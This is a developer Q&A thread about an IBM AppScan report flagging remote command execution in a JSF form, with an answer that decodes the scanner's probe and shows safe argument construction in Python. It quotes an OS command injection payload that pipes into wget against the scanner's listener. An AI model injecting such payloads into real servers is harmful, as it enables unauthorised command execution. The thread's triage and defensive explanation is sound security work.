
Original post: IBM AppScan

We recently received results from IBM AppScan DAST and some of the results don't make much sense.

Parameter: **javax.faces.source**
Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents

Fix: Set the "uri" attribute of the "domain" entity in the clientaccesspolicy.xml file to include specific domain names instead of any domain.


The following changes were applied to the original request:
Set the value of the parameter 'form:F_16275_1_input' to '%22%7Cwget+http%3A%2F%2F--AppScanLocalIpAddress--%3A--AppScanLocalPortNum--%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22'


Request/Response:
POST /***/itemliststatus.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Connection: keep-alive
Faces-Request: partial/ajax
X-Requested-With: XMLHttpRequest
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-

javax.faces.partial.ajax=true&javax.faces.source=form%3AbuttontextSearch&javax.faces.partial.execute=form&javax.faces.partial.render=j_idt17+unreadCountForm+j_idt22+menuform+messagingAppForm+form+formDialog&form%3AbuttontextSearch=form%3AbuttontextSearch&form=form&form%3AF_16275_0=12375541&form%3AF_16275_1_input=%22%7Cwget+http%3A%2F%2F********%3A55016%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22&form%3AF_16275_2_input=&form%3AF_16275_3_input=&form%3AF_16275_4_input=&form%3AF_16275_5_focus=&form%3AF_16275_5_input=&form
Ravi

  • Another nonsense report. You realize "clientaccesspolicy.xml" is for Microsoft Silverlight and no longer even exists? See: https://www.acunetix.com/vulnerabilities/web/insecure-clientaccesspolicy-xml-file/ – Melloware May 10 '20 at 12:31
  • @Melloware yes, I know. The only "silver light" in this question is that Google will in future bring people to this post and stop them from wasting time... ¯\_(ツ)_/¯ Taking a hit on my reputation for the general well-being of the future ¯\_(ツ)_/¯ – Ravi May 10 '20 at 14:05
  • To me, I would report all these issues to IBM AppScan so it stops reporting these false positives. I assume since it's IBM it's a 'paid' product and thus you can report these bugs directly to them as a paying customer? – Melloware May 10 '20 at 14:06
  • Agreed, but not sure if there is a mechanism to report it since IBM sold AppScan to HCL in 2019. – Ravi May 10 '20 at 14:10
  • If there is no mechanism for reporting bugs then your company is using the wrong tool... – Melloware May 10 '20 at 14:19
  • The reports are from our end client, who do their own pen test. We need to give them enough evidence to mark them as false positives since they told us they need a clean report to move ahead. – Ravi May 10 '20 at 14:31
  • Understood. I don't know how you are going to prove it to them without asking them to "prove" that what IBM AppScan is saying can be exploited, knowing that it can't. – Melloware May 10 '20 at 14:51
  • @Melloware: point them to these Stack Overflow posts... – Kukeltje May 10 '20 at 15:44
  • OK, found the link: https://help.hcltechsw.com/appscan/Standard/9.0.3/en-US/c_ReportFalsePositiveTestResults025.html#c_reportfalsepositivetestresults – Ravi May 10 '20 at 18:09
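The value AppScan wrote into form:F_16275_1_input is an out-of-band OS command injection probe: decoded, it closes a double quote, pipes into a wget aimed at the scanner's own listener (the --AppScanLocalIpAddress--:--AppScanLocalPortNum-- placeholders in the report's "changes applied" section), then pipes into echo and reopens the quote so a surrounding command line would still parse. Such a finding is only a true positive if the web server actually fetched that URL, and that callback is the evidence to ask the client for; the clientaccesspolicy.xml "fix" text has nothing to do with the test that was run. The helper below is an added example, not code from the question, from the application or from AppScan. It decodes the parameter from a constructed excerpt of the POST body above, extracts the callback URL the probe wants fetched, and contrasts a hypothetical vulnerable pattern (the value spliced between quotes into a shell string, `grep "..." items.txt`, which is an assumption for illustration and nothing the question shows the application doing) with argv-style construction, where the same value stays a single inert word. It needs Python 3.8 or later.

```python
"""Triage helper for the AppScan "remote command execution" finding above.

Added example, not code from the question, the application or AppScan.
Needs Python 3.8+ (shlex.join; punctuation_chars together with whitespace_split).
"""
import re
import shlex
from urllib.parse import parse_qs

# Constructed excerpt of the POST body quoted in the report. The scanner's
# address is masked in the original, so the --AppScan...-- placeholders from
# the report's "changes applied" section are used instead.
REQUEST_BODY = (
    "javax.faces.partial.ajax=true"
    "&javax.faces.source=form%3AbuttontextSearch"
    "&form%3AF_16275_0=12375541"
    "&form%3AF_16275_1_input=%22%7Cwget+http%3A%2F%2F--AppScanLocalIpAddress--"
    "%3A--AppScanLocalPortNum--%2FAppScanMsg.html%3FvarId%3D13314%7Cecho+%22"
    "&form%3AF_16275_2_input="
)

# Shape of the probe: close an assumed double quote, pipe into wget against the
# scanner's listener, pipe into echo and reopen the quote so that whatever
# follows in the hypothetical command line still parses.
OOB_PROBE = re.compile(r'^"\|wget\s+(?P<url>\S+)\|echo\s+"$')


def injected_value(body, param):
    """Decode one parameter from an application/x-www-form-urlencoded body."""
    return parse_qs(body, keep_blank_values=True)[param][0]


def callback_url(value):
    """URL the probe tries to make the server fetch, or None if `value` is
    not such a probe. A true positive shows up as an HTTP request from the
    web server to this URL; without that callback there is no evidence."""
    m = OOB_PROBE.match(value)
    return m.group("url") if m else None


def shell_words(command_line):
    """Split a command string the way a POSIX shell would, keeping operators
    such as | as words of their own."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def unsafe_command(value):
    """Hypothetical vulnerable pattern (an assumption for illustration, not
    taken from the application): the value is pasted between double quotes
    into a shell string. The probe's quote/pipe structure is built for this."""
    return shell_words(f'grep "{value}" items.txt')


def safe_command(value):
    """Argv-style construction: shlex.join quotes the value so a shell would
    see it as a single word; the pipes and quotes inside it are inert."""
    return shell_words(shlex.join(["grep", value, "items.txt"]))


if __name__ == "__main__":
    value = injected_value(REQUEST_BODY, "form:F_16275_1_input")
    print("decoded payload :", value)
    print("callback to     :", callback_url(value))
    print("spliced in shell:", unsafe_command(value))
    print("as one argument :", safe_command(value))
```

Run stand-alone, it prints the decoded probe, the listener URL it would call back to, the nine shell words the spliced version falls apart into (grep, an empty string, a pipe to wget, a pipe to echo) and the three-word argv where the whole payload is one argument. For the client, the check that matters is the middle one: if the scanner's listener never received a request from the server for AppScanMsg.html, the test produced no evidence of execution.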
